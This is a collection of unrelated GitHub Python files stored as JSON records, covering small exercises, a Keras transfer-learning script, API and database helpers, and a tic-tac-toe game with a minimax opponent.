measurements\n\nREQUIRED! Add analysis: what you did and what effect it had\n\"\"\"\nfrom timeit import timeit\n\n\ndef func_1(nums):\n new_arr = []\n for i in range(len(nums)):\n if nums[i] % 2 == 0:\n new_arr.append(i)\n return new_arr\n\n\ndef func_2(nums):\n return [i for i, x in enumerate(nums) if x % 2 == 0]\n\n\nif __name__ == \"__main__\":\n n_tests = 1000000\n a = [x for x in range(10000)]\n print(f'Append {timeit(\"func_1(a)\", globals=globals(), number=n_tests)} sec')\n print(f'LC {timeit(\"func_2(a)\", globals=globals(), number=n_tests)} sec')\n\n\"\"\"\nAppend 120.91151649999999 sec\nLC 95.49185170000001 sec\n\nCode readability improved; the list comprehension is 15-20% faster\n\n\"\"\"\n","repo_name":"alexsmr91/gb_python_algo","sub_path":"Урок 4. Практическое задание/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12741345367","text":"from sqlalchemy.orm import Session\nfrom typing import Union, List, Optional\n\nfrom db.models.power import Power\nfrom db.repository.utilities import _get_power_by_id\nfrom schemas.power import PowerCreate, UpdatePower\n\n\ndef create_new_power(power: PowerCreate, db: Session) -> Power:\n power_orm = Power(\n name=power.name,\n pp=power.pp,\n range=power.range,\n duration=power.duration,\n effect=power.effect,\n notes=power.notes,\n )\n db.add(power_orm)\n db.commit()\n db.refresh(power_orm)\n return power_orm\n\n\ndef retrieve_power(power_identifier: Union[int, str], db: Session) -> Optional[Power]:\n if isinstance(power_identifier, int):\n row = _get_power_by_id(power_identifier, db)\n elif isinstance(power_identifier, str):\n row = db.query(Power).filter(Power.name == power_identifier).first()\n else:\n return None\n\n if row is None:\n return None\n return row\n\n\ndef list_powers(db: Session) -> List[Power]:\n rows = db.query(Power).all()\n return rows if rows else []\n\n\ndef update_power(power_id: int, power: UpdatePower, db: Session) -> Power:\n power_data = _get_power_by_id(power_id, db)\n for var, value in power.dict(exclude_unset=True).items():\n setattr(power_data, var, value)\n db.commit()\n db.refresh(power_data)\n return power_data\n\n\ndef delete_power(power_id: int, db: Session) -> Power:\n power = _get_power_by_id(power_id, db)\n db.delete(power)\n db.commit()\n return power\n","repo_name":"jschmidt92/swade.io-older","sub_path":"api/db/repository/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25507469231","text":"import json\nimport ast\nfrom botocore.vendored import requests\nfrom botocore.vendored.requests import *\n\ndef lambda_handler(event, context):\n r = requests.post('https://login.microsoftonline.com/67bff79e-7f91-4433-a8e5-c9252d2ddc1d/oauth2/v2.0/token',\n data = {\n 'grant_type': 'client_credentials',\n 'scope': 'https://graph.microsoft.com/.default',\n 'client_id': 'XXXXXX',\n 'client_secret': 'XXXXX'\n }\n )\n resp = r.json()\n print(resp)\n \n access_token = resp[\"access_token\"]\n \n email_list = []\n no_email_list = []\n \n user_list = [\"user_id_1\", \"user_id_2\", \"user_id_3\", \"user_id_4\", \"user_id_5\"]\n for user in user_list:\n r = requests.get(\"https://graph.microsoft.com/v1.0/users/?$filter=mailNickname eq '\"+user+\"'\", headers={'Authorization': 'Bearer '+ access_token})\n get_res = r.json()\n print(get_res)\n if 
{"seq_id":"25507469231","text":"import json\nfrom botocore.vendored import requests\nfrom botocore.vendored.requests import *\n\ndef lambda_handler(event, context):\n    r = requests.post('https://login.microsoftonline.com/67bff79e-7f91-4433-a8e5-c9252d2ddc1d/oauth2/v2.0/token',\n            data = {\n                'grant_type': 'client_credentials',\n                'scope': 'https://graph.microsoft.com/.default',\n                'client_id': 'XXXXXX',\n                'client_secret': 'XXXXX'\n            }\n        )\n    resp = r.json()\n    print(resp)\n    \n    access_token = resp[\"access_token\"]\n    \n    email_list = []\n    no_email_list = []\n    \n    user_list = [\"user_id_1\", \"user_id_2\", \"user_id_3\", \"user_id_4\", \"user_id_5\"]\n    for user in user_list:\n        r = requests.get(\"https://graph.microsoft.com/v1.0/users/?$filter=mailNickname eq '\"+user+\"'\", headers={'Authorization': 'Bearer '+ access_token})\n        get_res = r.json()\n        print(get_res)\n        if len(get_res['value']) > 0:\n            email_field = get_res['value'][0]['mail']\n            email_list.append(email_field)\n        \n        else:\n            print(\"No email found\")\n            no_email_list.append(user)\n    \n    print(email_list)\n    print(no_email_list)\n    # encode each address individually; calling .encode() on the list itself raises AttributeError\n    email_list = [email.encode(\"utf-8\") for email in email_list]\n    print(email_list)\n","repo_name":"ManudattaG/my_python_project","sub_path":"code/getEmail_from_MS_O365_api.py","file_name":"getEmail_from_MS_O365_api.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"7153531982","text":"import json\r\ndef registerJson(dados):\r\n    with open(\"json.json\", 'r') as j:\r\n        arrayCadastrados = json.loads(j.read())\r\n        arrayCadastrados.append(dados)\r\n    with open('json.json', 'w') as json_file:\r\n        json.dump(arrayCadastrados, json_file,indent=4)\r\n\r\ndef alterJson(dados):\r\n    with open('json.json', 'w') as json_file:\r\n        json.dump(dados, json_file,indent=4)\r\n\r\ndef getTable():\r\n    with open(\"json.json\", 'r') as j:\r\n        contents = json.loads(j.read())\r\n    return contents\r\n\r\n\r\n##Record validation\r\ndef valid_register(name,lastname,value):\r\n    try:\r\n        value = int(value)\r\n        \r\n        if type(name) == str and type(lastname) == str and type(value) == int:\r\n            return True\r\n        else:\r\n            return False\r\n    except:\r\n        return False\r\n\r\n\r\ndef forPorcent():\r\n    json = getTable()\r\n    totalSum = 0\r\n    ##Adding up the total number of units\r\n    for row in json:\r\n        totalSum += int(row[\"participation\"])\r\n    #Converting the list to percentages\r\n    for row in json:\r\n        row[\"participation\"] = str(round(((int(row[\"participation\"])/totalSum)*100),2))+\"%\"\r\n    return json\r\n\r\n","repo_name":"Doctorspeppers/desafioCotabox","sub_path":"funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"34463671023","text":"import json\nimport urllib\nimport urllib2\nimport collections\nfrom datetime import datetime\nimport time\n\ndef getTempInfos(fromDate, toDate):\n    #encode url parameter for get request\n    params = urllib.urlencode({'from':fromDate, 'to':toDate})\n    responseContent = urllib2.urlopen(\"http://url/OfficeTemp/ajax/getTempsByDate.php?\" + params)\n\n    #load json response\n    js = json.load(responseContent)\n\n    #get current date\n    todayTemp = time.strftime(\"%Y-%m-%d\")\n    todayTemp = datetime.strptime(todayTemp, \"%Y-%m-%d\")\n\n    #set start/end time for workday from 8am to 5pm\n    workStart = todayTemp.replace(hour=8, minute=0)\n    workEnd = todayTemp.replace(hour=17, minute=0)\n\n    #declare variables for calculation\n    entryCount = 0\n    averageTemp = 0.0\n    highestTemp = 0.0\n\n    #loop through json objects 'Temps'\n    for entry in js['Temps']:\n        #convert date string to date object\n        dateObject = datetime.strptime(entry['Date'], '%Y-%m-%d %H:%M:%S')\n\n        #check if date is between start and end date\n        if workStart < dateObject < workEnd:\n            currentTemp = float(entry['Temp'])\n            averageTemp += currentTemp\n            entryCount += 1\n\n            #determine highest temp\n            if(currentTemp > highestTemp):\n                highestTemp = currentTemp\n\n    #determine average temp\n    averageTemp /= entryCount\n    averageTemp = round(averageTemp, 2)\n\n    #create named tuple for return value\n    tempInfo = collections.namedtuple('TempInfo', ['averageTemp', 'highestTemp'])\n    tInfo = tempInfo(averageTemp, highestTemp)\n    \n    return tInfo\n","repo_name":"wasteland540/OfficeTemp","sub_path":"raspberryPi/GetTempInfo.py","file_name":"GetTempInfo.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"31769501527","text":"\nimport math, copy, re, hashlib\nimport itertools as it\n# import lib for year 2020\nfrom lib import check_data, parse_row, has_all_fields\n\ndef rl(arr):\n\treturn range(len(arr))\n\ndef part_1(data):\n\n\tmax_id = 0\n\tmin_id = math.inf\n\tid_sum = 0\n\tfor i in data:\n\t\tcurr_id = int(i.replace(\"F\", \"0\").replace(\"B\", \"1\").replace(\"L\", \"0\").replace(\"R\",\"1\"), 2)\n\t\tid_sum += curr_id\n\t\tif curr_id > max_id:\n\t\t\tmax_id = curr_id\n\t\tif curr_id < min_id:\n\t\t\tmin_id = curr_id\n\tprint(max_id)\n\tprint('END OF PART1')\n\tpart_2(max_id, min_id, id_sum)\n\treturn\n\ndef ss(n):\n\treturn n * (n + 1) // 2\n\ndef part_2(max_id, min_id, id_sum):\n\n\tprint(ss(max_id) - ss(min_id - 1) - id_sum)\n\tprint('END OF PART2')\n\treturn \n\n\nif __name__ == '__main__':\n\twith open('05_input') as f:\n\t\tdata = f.read()\n\t\tdata = data.split('\\n')\n\t\t# data = list(map(int, data.split()))\n\n\n\tpart_1(copy.deepcopy(data))\n\t# part_2(copy.deepcopy(data))\n\t","repo_name":"PiErr0r/aoc","sub_path":"2020/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"1860050573","text":"import time\nimport requests\nimport os\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n                    format='%(asctime)s %(levelname)s %(message)s')\n\nn = 0\n\nwhile True:\n    n = (n + 1) % 1000000\n    message = {\"msg\": \"Hello, World! \" + str(n)}\n\n    logging.info(message)\n\n    try:\n        resp = requests.post(\n            \"\"\"http://localhost:3500/v1.0/invoke/nodereceiver/method/greeting\"\"\", json=message)\n    except Exception as e:\n        logging.error(e)\n    time.sleep(5)\n","repo_name":"gkgaurav31/dapr","sub_path":"dapr-with-kubernetes-quickstart/python_sender/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
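# Editor's illustrative sketch, not part of the records around it: the dapr sender above
# swallows failures and loops; requests' built-in Retry adapter is one alternative.
# The endpoint URL is taken from the record; the retry parameters are assumptions.
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

session = requests.Session()
session.mount('http://', HTTPAdapter(max_retries=Retry(total=3, backoff_factor=1)))
# session.post('http://localhost:3500/v1.0/invoke/nodereceiver/method/greeting', json={'msg': 'hi'})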
{"seq_id":"6500456596","text":"import pandas as pd\n# Data indexing and selection\n\n# Selecting data in a Series\ndata = pd.Series([0.25, 0.5, 0.75, 1.0], index = ['a', 'b', 'c', 'd'])\n# print(\"Data:\")\n# print(data)\n\n# Treat a Series as a dictionary (Python dict operations/expressions work)\n# print(\"data['b']: \", data['b'])\n# print(\"'a' in data: \", 'a' in data)\n# print(\"data.keys(): \", data.keys())\n# print(\"data.items(): \", list(data.items()))\n# A Series can also be modified with dict syntax, e.g. data['e'] = 1.25\ndata['e'] = 1.25\n# print(\"Data:\")\n# print(data)\n\n# Treat a Series as a one-dimensional array (NumPy array operations work)\n# Slicing by explicit index\n# print(\"data['a':'c']: \\n\", data['a' : 'c'])\n# Slicing by implicit integer index\n# print(\"data[1:4]: \\n\", data[1:4])\n# Masking\n# print(\"data[(data > 0.4) & (data < 1.2)]: \\n\", data[(data > 0.4) & (data < 1.2)])\n# Fancy indexing\n# print(\"data[['a', 'e']]: \\n\", data[['a', 'e']])\n\n# indexer: loc, iloc, ix\n# When the data uses integers as its row labels, integer indexing and explicit indexing can conflict or confuse,\n# so Pandas provides indexer attributes; a Series offers the three attributes loc, iloc and ix\ndata2 = pd.Series(['x', 'y', 'z'], index = [2, 3, 1])\n# print(\"Data2:\")\n# print(data2)\n\n# loc: indexing and slicing always follow the explicit index (the row labels)\n# print(\"data2[1]: \", data2[1]) # ('y' or 'z') is ambiguous; avoid needless errors once the data grows large\n# print(\"data2.loc[1]: \", data2.loc[1]) # 'z'\n# print(\"data2.loc[2:3]: \\n\", data2.loc[2:3]) # rows 1 and 2\n\n# iloc: indexing and slicing always follow the implicit integer index (Python-style, starting at 0)\n# print(\"data2.iloc[0]: \", data2.iloc[0]) # 'x'\n# print(\"data2.iloc[1:3]: \\n\", data2.iloc[1:3]) # rows 2 and 3\n\n# ix is a hybrid of the two; its effect shows mainly with DataFrames\n# In Python code \"explicit > implicit\", so loc and iloc are very useful for staying clean and readable (especially in this integer-index example)\n\n# Selecting data in a DataFrame\narea = pd.Series({'California' : 423967, 'Texas' : 695662, 'New York' : 141297,\n                 'Florida' : 170312, 'Illinois' : 149995})\npop = pd.Series({'California' : 38332521, 'Texas' : 26448193, 'New York' : 19651127,\n                'Florida' : 19552860, 'Illinois' : 12882135})\n\ndata = pd.DataFrame({'Area' : area, 'Population' : pop})\n# print(\"Data:\")\n# print(data)\n\n# Treat a DataFrame as a dictionary\n# print(\"data['Area']: \\n\", data['Area'])\n# print(\"data.Population: \\n\", data.Population)\n# Note: do not mix up DataFrame attribute names with dict-style column keys\n# The next line adds a new column to the DataFrame\ndata['density'] = data['Population'] / data['Area']\nprint(\"Data:\")\nprint(data)\n\n# Treat a DataFrame as a two-dimensional array\n# print(\"data.values: \\n\", data.values) # all values in the DataFrame (no labels)\n# print(\"data.T: \\n\", data.T) # transpose the DataFrame (e.g. 3x5 -> 5x3)\n\n# print(\"data.values[0]: \\n\", data.values[0]) # all values of the first row (no labels)\n# print(\"data['Area']: \\n\", data['Area']) # all data in the column labeled Area (with labels)\n# print(\"data['California']: \\n\", data['California']) # KeyError\n# line 73 (row labels cannot be accessed directly) <- because dict syntax looks up keys (one key, one value)\n\n# This is where the indexers come in handy for pulling data out of a DataFrame\n# print(\"data.iloc[:3, :2]: \\n\", data.iloc[:3, :2]) # the first 3 rows and first 2 columns\n# print(\"data.loc[:'New York', :'Population']: \\n\", data.loc[:'New York', :'Population'])\n# lines 77 and 78 give the same result; both were used above, next comes ix\n\n# ix can mix both styles (officially discouraged)\n# print(\"data.ix[:3, :'Population']: \\n\", data.ix[:3, :'Population']) # same result as the two calls above\n# Masks and fancy indexing work here too\n# print(\"data.loc[data.density > 100, ['Population', 'density']]: \\n\", \n#         data.loc[data.density > 100, ['Population', 'density']]) \n\n# The plain operators also accept slices, indexes and masks directly\nprint(\"data['Texas' : 'Illinois']: \\n\", data['Texas' : 'Illinois'])\nprint(\"data[1:5]: \\n\", data[1:5])\nprint(\"data[data.density >= 90]: \\n\", data[data.density >= 90])\n# These NumPy-like operations do not match Pandas semantics exactly, but they are very useful in practice","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Data Science/Pandas_Module/pandas_indexselect.py","file_name":"pandas_indexselect.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
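# Editor's illustrative sketch, not part of the tutorial record above: the loc/iloc
# distinction in four lines, on the same integer-labeled Series the tutorial builds.
import pandas as pd

s = pd.Series(['x', 'y', 'z'], index=[2, 3, 1])
print(s.loc[1])              # 'z' -> label-based lookup
print(s.iloc[1])             # 'y' -> position-based lookup
print(s.loc[2:3].tolist())   # ['x', 'y'] -> label slice, end inclusive
print(s.iloc[0:2].tolist())  # ['x', 'y'] -> position slice, end exclusive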
{"seq_id":"13973932956","text":"import enchant\r\nimport string\r\nimport random\r\n\r\nstring.ascii_lowercase\r\n'abcdefghijklmnopqrstuvwxyz'\r\n\r\nwordguess = \"\"\r\nknownlet = \"\"\r\nd = enchant.Dict(\"en_US\")\r\nprint(\"Try Donut and Raise as the first two words, then respond with any green letters, substitute any unknown letters with ?. For example: '?E??R'\")\r\ninput1 = input()\r\nprint(\"what are the out of place letters?\")\r\ninput2 = input()\r\nletternum = 0\r\n\r\nfor v in input1:\r\n    if v != \"?\":\r\n        knownlet += str(v)\r\n\r\nfor x in input2:\r\n    if x != \"?\":\r\n        knownlet += str(x)\r\n\r\nprint(\"known letters:\")\r\nprint(knownlet)\r\n\r\ne = 1\r\n\r\nguesses = []\r\n\r\nprint(\"-- SOLVING --\")\r\n\r\nwhile e in range(1,13000):\r\n    hasallknownlet = True\r\n    for i, w in enumerate(input1):\r\n        if w == \"?\":\r\n            randomlet = random.choice(string.ascii_lowercase)\r\n            # print(randomlet)\r\n            wordguess += randomlet\r\n        else:\r\n            # print(str(w))\r\n            wordguess += str(w)\r\n    # print(e)\r\n    # print(wordguess)\r\n    for f in knownlet:\r\n        if (f in wordguess) == False:\r\n            hasallknownlet = False\r\n    if hasallknownlet:\r\n        if (wordguess in guesses) == False:\r\n            if d.check(wordguess):\r\n                # print(wordguess)\r\n                # print(\"hi\")\r\n                guesses.append(wordguess)\r\n                e += 1\r\n                print(wordguess)\r\n    wordguess = \"\"\r\n    # e += 1\r\nprint(\"-- FINISHED --\")\r\nprint(guesses)\r\n\r\n# print(wordguess)\r\n","repo_name":"couchpotatochip21/wordlesolver","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"33727953269","text":"\n#this will not work well with strings that have duplicates.\n# time complexity: O(n*n!) \n# this algorithm does not work great with long instances,\n# although an example like baaaaaaaaaaaa, despite its large size, can only \n#produce 13 unique permutations, so it should not normally take too long.\n# the reason for it taking too long is that the algorithm is trying to generate all permutations and \n# then remove those that are identical.\n\n# how can we generate non-identical ones only?\n\ndef allPermutations(strng):\n    if len(strng) ==1:\n        return [strng]\n    perm_list = []\n    #for i in set(strng):\n    #    smallerStr = strng.replace(i,\"\")\n    for idx, i in enumerate(strng):\n        if strng.count(i) == len(strng):\n            perm_list = [strng]\n            continue\n        \n        \n        #smallerStr = strng.replace(i,\"\",1)\n        #smallerStr = strng[:idx] + strng[idx+1:]\n        #print(smallerStr)\n        smallerStr = strng[:idx]+strng[idx+1:]\n        z = allPermutations(smallerStr)\n        for t in z:\n            if not (i+t) in perm_list:\n                perm_list.append(i+t)\n        \n    return perm_list\n\nprint(allPermutations(\"baaaaa\"))\n","repo_name":"rampedro/Cracking-the-coding-interview-leetcode","sub_path":"permut.py","file_name":"permut.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
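# Editor's illustrative sketch, not part of the records around it: one answer to the
# question in the docstring above -- generate only distinct permutations by recursing
# over a character-count map instead of deduplicating afterwards.
from collections import Counter

def distinct_permutations(s):
    counts = Counter(s)
    out = []
    def walk(prefix):
        if len(prefix) == len(s):
            out.append(prefix)
            return
        for ch in counts:
            if counts[ch]:
                counts[ch] -= 1      # consume one occurrence of ch
                walk(prefix + ch)
                counts[ch] += 1      # backtrack
    walk('')
    return out

print(len(distinct_permutations('baaaaaaaaaaaa')))  # 13, with no duplicate work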
{"seq_id":"71159493314","text":"import os\nfrom keras.applications import ResNet50, VGG16\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers, callbacks\nfrom keras.models import Sequential\nfrom keras.layers import Input, Dropout, Flatten, Dense\nfrom keras.models import Model\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport glob\n\nN_classes = 3\nBatch_size = 32  # default batch size for generate_bn_features\n\ndef assert_validity(args):\n    valid_models = ['resnet50', 'vgg16', 'vgg19', 'inception_v3', 'xception']\n    valid_groups = [\n        'F_Ped', 'M_ped',\n        'F_YA', 'M_YA',\n        'F_Adult', 'M_Adult',\n        'F_Ger', 'M_Ger']\n\n    assert args.model in valid_models, '{} not a valid model name'.format(args.model)\n    assert args.group in valid_groups, '{} not a valid group'.format(args.group)\n\n\ndef prep_dir(args):\n    group, model = args.group, args.model\n    model_path = 'models/' + group + '/' + model + '/'\n    if not os.path.exists(model_path):\n        os.makedirs(model_path)  # creates models/, models/<group>/ and the model dir in one call\n    return model_path\n\n\ndef get_base_model(model):\n    if model == 'resnet50':\n        base_model = ResNet50(weights='imagenet', include_top=False,\n                              input_tensor=Input(shape=(224, 224, 3)))\n\n    elif model == 'vgg16':\n        base_model = VGG16(\n            weights='imagenet',\n            include_top=False,\n            input_tensor=Input(shape=(224, 224, 3)))\n\n    # elif model == 'vgg19':\n    #     base_model = applications.vgg19.VGG19(\n    #         weights='imagenet',\n    #         include_top=False,\n    #         input_tensor=input_tensor)\n    # elif model == 'inception_v3':\n    #     base_model = applications.inception_v3.InceptionV3(\n    #         weights='imagenet',\n    #         include_top=False,\n    #         input_tensor=input_tensor)\n    # elif model == 'xception':\n    #     base_model = applications.xception.Xception(\n    #         weights='imagenet',\n    #         include_top=False,\n    #         input_tensor=input_tensor)\n    else:\n        print('You should not be here')\n\n    return base_model\n\n\ndef one_hot_labels(labels):\n    one_hot = np.zeros((labels.size, N_classes))\n    one_hot[np.arange(labels.size), labels] = 1\n    return one_hot\n\n\ndef count_files(directory):\n    \"\"\"Get number of files by searching directory recursively\"\"\"\n    if not os.path.exists(directory):\n        return 0\n    cnt = 0\n    for r, dirs, files in os.walk(directory):\n        for dr in dirs:\n            cnt += len(glob.glob(os.path.join(r, dr + \"/*\")))\n    return cnt\n\n\ndef get_callbacks(model, group):\n    \"\"\"\n    :return: A list of `keras.callbacks.Callback` instances to apply during training.\n\n    \"\"\"\n    path = 'models/' + group + '/' + model + '/'\n    return [\n        callbacks.ModelCheckpoint(\n            filepath=path+'weights.{epoch:02d}-{val_loss:.2f}.hdf5',\n            monitor='val_acc',\n            verbose=1,\n            save_best_only=True),\n        callbacks.EarlyStopping(\n            monitor='val_loss',\n            patience=12,\n            verbose=1),\n        callbacks.ReduceLROnPlateau(\n            monitor='val_loss',\n            factor=0.6,\n            patience=2,\n            verbose=1),\n        # callbacks.LambdaCallback(on_epoch_end=on_epoch_end),\n        callbacks.TensorBoard(\n            log_dir='TBlog/',\n            histogram_freq=4,\n            write_graph=True,\n            write_images=True)\n    ]\n\n\ndef generate_bn_features(model, group):\n    model = get_base_model(model)\n    train_path = 'data/train_224x224/' + group + '/train/'\n    test_path = 'data/train_224x224/' + group + '/test/'\n    batch_size = Batch_size\n    n_steps_train = np.ceil(count_files(train_path) / batch_size)\n    n_steps_test = np.ceil(count_files(test_path) / batch_size)\n    datagen = ImageDataGenerator(rescale=1./255)\n\n    train_generator = datagen.flow_from_directory(\n        directory=train_path,\n        target_size=(224, 224),\n        batch_size=Batch_size,\n        class_mode='categorical',\n        shuffle=False)\n    bottleneck_features_train = model.predict_generator(\n        generator=train_generator,\n        steps=n_steps_train,\n        workers=4,\n        verbose=1)\n    np.save('models/' + group + '/bottleneck_features_train',\n            bottleneck_features_train)\n    np.save('models/' + group + '/train_classes', train_generator.classes)\n\n    test_generator = datagen.flow_from_directory(\n        directory=test_path,\n        target_size=(224, 224),\n        batch_size=Batch_size,\n        class_mode='categorical',\n        shuffle=False)\n    bottleneck_features_test = model.predict_generator(\n        generator=test_generator,\n        steps=n_steps_test,\n        workers=4,\n        verbose=1)\n    np.save('models/' + group + '/bottleneck_features_test',\n            bottleneck_features_test)\n    np.save('models/' + group + '/test_classes', test_generator.classes)\n
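# Editor's illustrative aside, not from the original module: a sanity check over the\n# cached arrays written by generate_bn_features before training the top model;\n# check_bn_features is a hypothetical helper name.\ndef check_bn_features(group):\n    feats = np.load('models/' + group + '/bottleneck_features_train.npy')\n    labels = np.load('models/' + group + '/train_classes.npy')\n    assert feats.shape[0] == labels.shape[0]  # one bottleneck feature map per image\n    return feats.shape\n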
\n\ndef train_top_only(model, group):\n    base_model = get_base_model(model)\n    weights_path = 'models/' + group + '/' + model + '/bottleneck_fc_model.h5'\n    train_data = np.load('models/' + group + '/bottleneck_features_train.npy')\n    train_labels = one_hot_labels(\n        np.load('models/' + group + '/train_classes.npy'))\n    test_data = np.load('models/' + group + '/bottleneck_features_test.npy')\n    test_labels = one_hot_labels(\n        np.load('models/' + group + '/test_classes.npy'))\n\n    top_model = Sequential()\n    top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n    top_model.add(Dense(256, activation='relu', name='fcc_0'))\n    top_model.add(Dropout(0.5))\n    top_model.add(Dense(N_classes, activation='softmax', name='class_id'))\n    print('Model bottom loaded.')\n\n    top_model.compile(\n        optimizer='SGD',\n        loss='categorical_crossentropy',\n        metrics=['accuracy'])\n\n    print('Please input top training parameters: \\n')\n    Batch_size = int(input('Batch size: '))\n    N_Epochs = int(input('Epochs:'))\n\n    top_model.fit(\n        x=train_data,\n        y=train_labels,\n        epochs=N_Epochs,\n        batch_size=Batch_size,\n        validation_data=(test_data, test_labels),\n        callbacks=get_callbacks(model, group),\n        verbose=1)\n\n    top_model.save_weights(weights_path)\n    print('Model top trained.')\n\n\ndef fine_tune(model, group):\n\n    weights_path = 'models/' + group + '/' + model + '/bottleneck_fc_model.h5'\n    train_path = 'data/train_224x224/' + group + '/train/'\n    test_path = 'data/train_224x224/' + group + '/test/'\n\n    N_train_samples = count_files(train_path)\n    N_test_samples = count_files(test_path)\n\n    base_model = get_base_model(model)\n    print('Model bottom loaded.')\n    top_model = Sequential()\n    top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n    top_model.add(Dense(256, activation='relu', name='fcc_0'))\n    top_model.add(Dropout(0.5))\n    top_model.add(Dense(N_classes, activation='softmax', name='class_id'))\n    top_model.load_weights(weights_path)\n    full_model = Model(inputs=base_model.input,\n                       outputs=top_model(base_model.output))\n\n    print('Please input fine-tuning parameters: \\n')\n    Batch_size = int(input('Batch size: '))\n    N_Epochs = int(input('Epochs:'))\n    N_layers_to_finetune = int(input('# of last layers to finetune:'))\n\n    # train the last N layers, freeze everything below them\n    for layer in full_model.layers[-N_layers_to_finetune:]:\n        layer.trainable = True\n    for layer in full_model.layers[:-N_layers_to_finetune]:\n        layer.trainable = False\n\n    full_model.compile(loss='categorical_crossentropy',\n                       optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n                       metrics=['accuracy'])\n\n    datagen = ImageDataGenerator(\n        rescale=1. / 255,\n    )\n\n    train_generator = datagen.flow_from_directory(\n        train_path,\n        target_size=(224, 224),\n        batch_size=Batch_size,\n        class_mode='categorical',\n        shuffle=True)\n\n    test_generator = datagen.flow_from_directory(\n        test_path,\n        target_size=(224, 224),\n        batch_size=Batch_size,\n        class_mode='categorical',\n        shuffle=True)\n\n    # fine-tune the model\n    full_model.fit_generator(\n        generator=train_generator,\n        steps_per_epoch=np.ceil(N_train_samples / Batch_size),\n        epochs=N_Epochs,\n        verbose=1,\n        callbacks=get_callbacks(model, group),\n        validation_data=test_generator,\n        validation_steps=np.ceil(N_test_samples / Batch_size),\n        class_weight=None,\n        max_q_size=10,\n        workers=4,\n        pickle_safe=False,\n        initial_epoch=0)\n
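# Editor's illustrative aside, not from the original module: a quick check that the\n# freeze/unfreeze split requested in fine_tune took effect; a hypothetical helper.\ndef count_trainable_layers(keras_model):\n    return sum(1 for layer in keras_model.layers if layer.trainable)\n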
\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--model', default='resnet50',\n                        help='The network eg. resnet50')\n    parser.add_argument('--group', default='F_Adult', help='Demographic group')\n    parser.add_argument('--generate_bn_features', action='store_true',\n                        help='Flag to generate bottleneck features')\n    parser.add_argument('--train_top_only',\n                        action='store_true', help='Flag to retrain')\n    parser.add_argument('--finetune', action='store_true',\n                        help='Flag to fine tune')\n\n    args = parser.parse_args()\n\n    assert_validity(args)\n    model_path = prep_dir(args)\n    bn_features_path = model_path + 'bottleneck_features_train.npy'\n    weights_path = model_path + 'bottleneck_fc_model.h5'\n\n    if args.generate_bn_features:\n        generate_bn_features(args.model, args.group)\n\n    if args.train_top_only:\n        if not os.path.exists(bn_features_path):\n            print('Bottleneck features file not found! Generate first.')\n        else:\n            train_top_only(args.model, args.group)\n\n    if args.finetune:\n        if not os.path.exists(weights_path):\n            print('Weights file not found! Train top first.')\n        else:\n            print('Fine tuning:')\n            fine_tune(args.model, args.group)\n\n    if not args.train_top_only and not args.finetune:\n        print('No retraining selected.')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"YaronBlinder/tensorflow_transferlearning_finetuning","sub_path":"work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
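# Editor's illustrative usage sketch, not part of either dataset record: how the
# training script above is presumably invoked; group names mirror its argparse setup.
#   python work.py --model resnet50 --group F_Adult --generate_bn_features
#   python work.py --model resnet50 --group F_Adult --train_top_only
#   python work.py --model resnet50 --group F_Adult --finetune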
\", \" \", \" \"]\nprint(\"Are you ready to play tic tac toe?\")\nboard_print(board_list)\n\nsymbol = \"O\"\ngame_over = False\navailable_squares = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\nturn_count = 0\nwhile not game_over:\n turn_count = turn_count + 1\n # symboling the board\n print(\"It's \" + symbol + \"'s turn!\")\n\n if symbol == \"O\":\n # Human players turn\n chosen_square = input(\"Where do you want to play? \")\n\n while chosen_square not in available_squares:\n print(\"That square is not available! Please try again.\")\n print(\"The available squares are:\", available_squares)\n chosen_square = input(\"Where do you want to play? \")\n else:\n # Computer players turn\n chosen_square = choose_computer_move(board_list, available_squares)\n\n available_squares.remove(chosen_square)\n square_index = int(chosen_square) - 1\n board_list[square_index] = symbol\n\n board_print(board_list)\n print(\"Computer's evaluation of the current board:\", evaluate_board(board_list, symbol))\n\n # Checking the winner\n game_won = check_winner(board_list)\n if game_won:\n print(\"The winner is \" + game_won + \" !\")\n game_over = True\n elif turn_count == 9:\n print(\"It's a tie!\")\n game_over = True\n\n # Taking turns\n if symbol == \"O\":\n symbol = \"X\"\n elif symbol == \"X\":\n symbol = 